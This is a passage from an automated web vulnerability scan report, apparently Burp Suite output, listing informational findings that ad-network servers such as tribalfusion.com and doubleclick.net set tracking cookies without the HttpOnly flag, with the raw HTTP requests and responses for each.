ANON_ID=ajnhU0OleCZcoXNxdvLZbgFDCR0ZbXUicN4aAwMydiEU8FhYk0JvdwpFopnWjoaFZbZcqZbvW8HfglHlBZaPA0gLTVAcC4v2qjOPhZdyeGu763idXiqdje3Y7HTbJfyH97QXmdE8yLL1L1gQ46YnnYZdGZdms2dcHZb0Zan5Nrh3j1wlZcHo9r9Wtnbeu9nEajEU1g15wnZard0xExVXU2ZdOZatJufn71trckZdEF6gG3ZdWg7GIcKLAbPy73MeOiOsdAZdGeyx0HZa6sYJj6oMJLxp7v2ZbyMsUr1sju2gjc0AiZaNXBsyHeMWaB062k2eLeTelKvb7dXpOyofHkeDpKLxniSYQgtZactrYj1QadNR5DrpkZayevr7bLBWKYW8S1EfEl1un2CKUr50bgBS3wdJZcK5nXkPHKvX0fDZdZahaEKXOJMK3G0crTwCZayqOJjfJYZcZaE8uZde5jDe6BOFseXQsO6sKnZcT8VXjiSxIbZcsJR67Xwsk; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:46 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ajnhU0OleCZcoXNxdvLZbgFDCR0ZbXUicN4aAwMydiEU8FhYk0JvdwpFopnWjoaFZbZcqZbvW8HfglHlBZaPA0gLTVAcC4v2qjOPhZdyeGu763idXiqdje3Y7HTbJfyH97QXmdE8yLL1L1gQ46YnnYZdGZdms2dcHZb0Zan5Nrh3j1wlZcHo9r9Wtnbeu9nEajEU1g15wnZard0xExVXU2ZdOZatJufn71trckZdEF6gG3ZdWg7GIcKLAbPy73MeOiOsdAZdGeyx0HZa6sYJj6oMJLxp7v2ZbyMsUr1sju2gjc0AiZaNXBsyHeMWaB062k2eLeTelKvb7dXpOyofHkeDpKLxniSYQgtZactrYj1QadNR5DrpkZayevr7bLBWKYW8S1EfEl1un2CKUr50bgBS3wdJZcK5nXkPHKvX0fDZdZahaEKXOJMK3G0crTwCZayqOJjfJYZcZaE8uZde5jDe6BOFseXQsO6sKnZcT8VXjiSxIbZcsJR67Xwsk; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:46 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=aLnh31pki1L7uo2S6cZdfBiefhAYTcmZdPe1UlQt6sOZaYnp20LEVis7DblhuGZdWr3iUIKVAAnyk0L8ZbBH5UpVHDrWtglPFkiZcb4rOMGHaJsnWwtS6IeXOdfuOmsvSuJCsnkssoxoZbUZdPB0Q8dN1aJpj5Doj68l1wgbWooKP4Zat7tFDuxQZcZcxYZb9LdwKybZbl7AjkbDQRBt7yd4uyCj0jMu0HCv5PhUXZcS8Ck3pKbEdaVkvFDgyU6s3OMx4b5RLhRwd3O48JKmM1crsFB4G84ZclaZcp6NdFZbUT64yL4hq5O4t8y1SKdJIQKcfOF6JqYG4L3E3FMr9Gi6S4KoNTWPtkbyssxZdrZcTfovZaj9TNZcFfRKigm1RNsfZbJ45MOBjdVpYXmI8BIpUomE7QZb9NfxuwrcUD7NaC5Wh30PudDkV6kkdsunvEvBZctU1YqD59wtTyv2UgSXRmXQXZdfe1CMqRl2LldvOMEkjZcIsf; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:48 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aLnh31pki1L7uo2S6cZdfBiefhAYTcmZdPe1UlQt6sOZaYnp20LEVis7DblhuGZdWr3iUIKVAAnyk0L8ZbBH5UpVHDrWtglPFkiZcb4rOMGHaJsnWwtS6IeXOdfuOmsvSuJCsnkssoxoZbUZdPB0Q8dN1aJpj5Doj68l1wgbWooKP4Zat7tFDuxQZcZcxYZb9LdwKybZbl7AjkbDQRBt7yd4uyCj0jMu0HCv5PhUXZcS8Ck3pKbEdaVkvFDgyU6s3OMx4b5RLhRwd3O48JKmM1crsFB4G84ZclaZcp6NdFZbUT64yL4hq5O4t8y1SKdJIQKcfOF6JqYG4L3E3FMr9Gi6S4KoNTWPtkbyssxZdrZcTfovZaj9TNZcFfRKigm1RNsfZbJ45MOBjdVpYXmI8BIpUomE7QZb9NfxuwrcUD7NaC5Wh30PudDkV6kkdsunvEvBZctU1YqD59wtTyv2UgSXRmXQXZdfe1CMqRl2LldvOMEkjZcIsf; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:23:48 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=a8nFsew5EGs6aIN4eHsZcnCPD7kSFUw68IIYkNKVhxIVjvsZcHY2wEvLSH2qw8AnEmZcAfwuRuTgnXvgZdt9fFMRZbj0V8xHtsZbZdf8MNpRHneQdLvCCmDM2BgwLjFtpkjDrq2XnZbXn9ZclgATAF6mDiGZagUPiZdqBUgoLOBRnZax8Wxn6OrmXkue2FEXTAoWoZc4vZbVmQ1BmAd1l9AJNrZcZcX8ShpZavelUaq0NZdkPZckBA4Zcd6lNMdrLHxBwXkxHVsqxvKvBpSCJRadFJvpjRmBv0E4NVaHw9ZdFPT77XlY0mmCZdZdAZbRvkLKnweZcGRD5VpgIDdCqQIZcZdUS3xTlncVObydYEee5m857GnDXTbvvVZafEPTF8rK8bSce61Hy4U1wka5ZbZd1iQ5jDImV3gAW7gpRbpjanM6sNXDSpvxwaBdET5IBIVubSBT3xZclS8uRXvF1Xn7tg8jZaQSqVYLqPEbIwPZcpc02IddRFeZcPU6XZdwBsU7ZaLYpFTneGaRQCnMq8TUbP27hAWxVPMC76kmGva3qbYaqyVXrjZaZdXtfHZc81XOFyNMZb76UDdyadNtZdSYxvvZdW7pxOWU9q791YOBus; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:23 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a8nFsew5EGs6aIN4eHsZcnCPD7kSFUw68IIYkNKVhxIVjvsZcHY2wEvLSH2qw8AnEmZcAfwuRuTgnXvgZdt9fFMRZbj0V8xHtsZbZdf8MNpRHneQdLvCCmDM2BgwLjFtpkjDrq2XnZbXn9ZclgATAF6mDiGZagUPiZdqBUgoLOBRnZax8Wxn6OrmXkue2FEXTAoWoZc4vZbVmQ1BmAd1l9AJNrZcZcX8ShpZavelUaq0NZdkPZckBA4Zcd6lNMdrLHxBwXkxHVsqxvKvBpSCJRadFJvpjRmBv0E4NVaHw9ZdFPT77XlY0mmCZdZdAZbRvkLKnweZcGRD5VpgIDdCqQIZcZdUS3xTlncVObydYEee5m857GnDXTbvvVZafEPTF8rK8bSce61Hy4U1wka5ZbZd1iQ5jDImV3gAW7gpRbpjanM6sNXDSpvxwaBdET5IBIVubSBT3xZclS8uRXvF1Xn7tg8jZaQSqVYLqPEbIwPZcpc02IddRFeZcPU6XZdwBsU7ZaLYpFTneGaRQCnMq8TUbP27hAWxVPMC76kmGva3qbYaqyVXrjZaZdXtfHZc81XOFyNMZb76UDdyadNtZdSYxvvZdW7pxOWU9q791YOBus; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:23 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=annFseoZdUQMo2HpivbwkXqrnTC3Gq4ZamyyXMNuQ5tpx4qkEqfbRrjjSdPNrBJTcUkZaZbfXx2aKlrIsUwBiFxVnWqtR1BUNFc109MAN5UxU7cik5WAjeajoV6F5D8yNswhqCd0j5AJcfQPB9oPXqfZcAqlKyrSZdNZdqVN0GeGG1mnmxdZaCyfIWG4u4vHZcvTyFdnGocxbW98c7xrVkIT71ESOa599qlUM0MVlGAAkV0iw1qCrwbsAlxlvN7mG9ZaC3B1mnPh9cF6n9yFxSBUJilqedSUgtbul8vLrIEED2ZdoKcrUcvy88MrWhkCUgeZdjZbWXjigr5veqGUVs7IZbxDJKj5sc91eSZduRHnnONQ0SdfwQYc9NpEMyEigm2opf5bOWMi29qaDy5syYHc0Wrtkc8JRS0ZbdPsnZdyBZb9ZdDp9L1ofFRP1Si0DW9iA0OfFS73A6dbMPE3nRkEeJ6fI1jS6V5AIH7X5CcFxWZalRmqJZbLfhuXaZbZdBR66yy7BUW2d0Spr55Vu4nuYfnGPiZbboRsZap1gaZdAlnBZarxZcU147PiJv6pUn6Ie2SECLSIJAdcrUwJL5jWeGaaOUcZd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:24 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=annFseoZdUQMo2HpivbwkXqrnTC3Gq4ZamyyXMNuQ5tpx4qkEqfbRrjjSdPNrBJTcUkZaZbfXx2aKlrIsUwBiFxVnWqtR1BUNFc109MAN5UxU7cik5WAjeajoV6F5D8yNswhqCd0j5AJcfQPB9oPXqfZcAqlKyrSZdNZdqVN0GeGG1mnmxdZaCyfIWG4u4vHZcvTyFdnGocxbW98c7xrVkIT71ESOa599qlUM0MVlGAAkV0iw1qCrwbsAlxlvN7mG9ZaC3B1mnPh9cF6n9yFxSBUJilqedSUgtbul8vLrIEED2ZdoKcrUcvy88MrWhkCUgeZdjZbWXjigr5veqGUVs7IZbxDJKj5sc91eSZduRHnnONQ0SdfwQYc9NpEMyEigm2opf5bOWMi29qaDy5syYHc0Wrtkc8JRS0ZbdPsnZdyBZb9ZdDp9L1ofFRP1Si0DW9iA0OfFS73A6dbMPE3nRkEeJ6fI1jS6V5AIH7X5CcFxWZalRmqJZbLfhuXaZbZdBR66yy7BUW2d0Spr55Vu4nuYfnGPiZbboRsZap1gaZdAlnBZarxZcU147PiJv6pUn6Ie2SECLSIJAdcrUwJL5jWeGaaOUcZd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:24 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

11.207. http://a.tribalfusion.com/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=acn9yYr2PKMbuYn3Ycn4F5XpyFRGnTGDP2XlKn4flsYZaThCaY83G72Ttfc5CJViEZdoE1yd1Usq1ZbkfXpBHsFbApGkQGaGqZahSVsP8xUffgA1ZcJVp3fGOk7aFW4RXZdTdir1WbQPysXanCH1StdPbR7GqZauWGq8Y6I9JPro4uHhxESlZbSqZbJPt8EUtHZdhVXqPEBFUuZd4qdrX2qCIkoIyfEZaVUjyXqKZb6MKiReZdmBw1Zc3rThnZaB2yPbObsqku3t2yYFpeArR41kxK4jvH0GX38pfMAcc7tQmrno85a83b4DEKPAUQtQMl5tshRx5ZbGTn6TnNL6Eci6b9WavR62BX5N2WpqNp6pVCEj66XWGv45XZcl03UDwgInTwrFUORinp35JMdrGb; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:27:34 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.208. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=apnbTgRkP6sAeCnr7aThQZcqPBHtrraZbSTRTZaxKPOHouZaJVIbQTSsBUPqmi4nEtfb83Zcvec3S8iUvCOxoTGpb74mTNHJQwaKvcNy6crTZaEDIyKsscnXKMV6dVS8Cjj39a44AW1RJsMFxcrNOalv5cGbdo53CJ3hSJeZbwgoZdoPQvB5XBWaxBldqc0yx46ZcRTwOnpIEM67ujH5rk8FCBUxUTVho7T8IJUMTYZd0TwwCm3rUsvAfXeyPY3GrFVTMo0OPnkPqLNfy7lucPe6JOaARob4cdJG8W6oycO0gCTFlhcLuNw9jFtSed6uw6r0tHISg1pRvsWAO7MY3Lr2uFxDUtZcyTAckJYAI3d3XPSQriZdEE06yPgwHHqlv652SvRZceLbX88lCpQEtnNoTnYu8efdTYcJkNCsd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 14:14:39 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=apnbTgRkP6sAeCnr7aThQZcqPBHtrraZbSTRTZaxKPOHouZaJVIbQTSsBUPqmi4nEtfb83Zcvec3S8iUvCOxoTGpb74mTNHJQwaKvcNy6crTZaEDIyKsscnXKMV6dVS8Cjj39a44AW1RJsMFxcrNOalv5cGbdo53CJ3hSJeZbwgoZdoPQvB5XBWaxBldqc0yx46ZcRTwOnpIEM67ujH5rk8FCBUxUTVho7T8IJUMTYZd0TwwCm3rUsvAfXeyPY3GrFVTMo0OPnkPqLNfy7lucPe6JOaARob4cdJG8W6oycO0gCTFlhcLuNw9jFtSed6uw6r0tHISg1pRvsWAO7MY3Lr2uFxDUtZcyTAckJYAI3d3XPSQriZdEE06yPgwHHqlv652SvRZceLbX88lCpQEtnNoTnYu8efdTYcJkNCsd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 14:14:39 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 660

document.write('<IFRAME src="http://a.tribalfusion.com/p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36
...[SNIP]...

11.209. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAxZEByjtDTQAAAAAAAAAAAAAAAAAAAADUO0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.210. http://ad.doubleclick.net/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/click

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

id=c653243310000d9|2782903/1009150/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.211. http://ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

id=c653243310000d9|1033942/1042959/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.212. http://ad.doubleclick.net/jump/N6103.135388.BIZO/B5185769.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/N6103.135388.BIZO/B5185769.6

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

id=c653243310000d9|3050873/1051395/15002|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.213. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
adImpCount=93BCq0WTCVMxF4AWDa_UBzGK2WVGmSebj4padkL3fXlh-L3XcPmT4hHXOQgApIlYCBsZxoRT6EzfAaBOxC9wKX8qYrC9FMnU5Q2wRAYDGypi9OYrtG-b0iAWL5Sg__z6OEq2AfRSlzTnZwWXTHks0QZw0eRZgpytzjhC6uPoirk_GMdu-y1E9O4PMUo2v2JwhEaBrxFtkyt_nkQhj928o37eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJw1Kd0O3adRO10CesNfjCJaQrupC4PpJl2uCWF8C-Ug5JonU1AejF4MphQeZeUYshY_OeXGaHeEWZpxqUmyoO4ex_oV54IeDig5WzYLup3TcrrvyCQus6kPDo2a6SDFY3VUvCEsZdhQvkMaGDNXRUK74rP1CqKPcaX2koNpmFe4031p3A6UMJjebe8drcGsyS4Zsrl5itefLEEgtwe41cGh3HscxZqdV3tAgaup_BUiqfohDo4-tul6_WuD8j0eMjBk0vy7k2KCP9mAU3yIXJQsGDwUqNo5bwBfJavyMoCpX2Mtj8-j4P85vtqL-bgk4Jg88QTsvGp_uMnqAhaiuvUqwwwjl5KiXaen7PpuSxadNSx5tYcmc04sL2FZMw7u1ZPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6ZETO-MbYZA0ULyuOeS61QiyzaIjIkAm2O1xn3y2FwP0uPWnCg7Sts-m8PiyghybB3-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lA11f5HvjRM9LIAbnXs0Li7sXDmro6MsrnR0NjzyjJ0TpQgutzeDGCBRPRExuEdlCI6QrupC4PpJl2uCWF8C-Ug4Qr4-ZP_IMKsn4iIvW22r5067axWP77CNDdpZKPWLlS6EqzrlzsjMft3cRcjGnFvlTek5Lj_h7B1Bewly4iRmuVUvCEsZdhQvkMaGDNXRUK1IwqsroZj1oRmZCrinK3xPqzZ3gkHjNDLavV-i2IDmnytv5VAjvqHzGGgVc9TLFt3n4e5tgg6Ff1RgMWUU5h-ufohDo4-tul6_WuD8j0eMjcK-jZlyP6xG2V_Rmz3l2ScGDwUqNo5bwBfJavyMoCpUNbeNuKs3BuRiO6omJfcAAyR5nk0A4EbdYMkjxQX8Hhqwwwjl5KiXaen7PpuSxadOt4qBzD-0ra0lWqOClC2AdPveIf8j2XY661VgXz9vKr9po5kaVd3TDYjljHCv4vLrze8F97qvYfrL-2a4LxLlnvjmctIv6W_2bTZNXeWSbh689PoZZTdQXeDWLQpeFTD3-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukPU0BHKzioTSvOcuG_kdCGnpgcqiBETfVCgh6rOLqPGrWJcu-kcMstt6LYwLOO39vXw6eBg1etFW